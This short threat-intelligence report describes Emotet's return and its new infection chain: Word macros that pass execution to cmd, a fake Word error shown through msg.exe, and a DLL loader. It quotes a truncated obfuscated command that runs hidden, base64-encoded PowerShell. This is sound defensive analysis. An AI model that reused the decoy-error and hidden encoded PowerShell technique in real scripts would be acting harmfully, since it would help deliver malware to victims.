Recently, the prolific botnet Emotet has returned after a hiatus of several months. Starting on Monday (Dec 21), Binary Defense observed Emotet spinning up massive spam campaigns using malicious Microsoft Word document files sent as attachments. While the document lure seemed visually similar to those used by Emotet in the past, both the document file and the loader code received some significant changes. First, in the VBA macro code in the document files, the typical execution flow has changed. Instead of launching PowerShell directly from the macro embedded in the document, the document macro will now pass execution to cmd in a new process, which will eventually open PowerShell with the following command, while using the msg.exe program to display a fake error message supposedly from Word:
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQAIAAoACcAVQAnACsAJwAyADYAcwBUACcAKQAgACAAKABbAFQAWQBwAGUAXQAoACIAewAzAH0Aew…
Additionally, the next big change to Emotet was in the loader. Instead of dropping an EXE file, Emotet’s newest loader is now a DLL, and contains a single exported function named RunDLL, which executes Emotet’s main code.
These changes show that even though Emotet was not spamming during those long months, development activity was still occurring for this malware.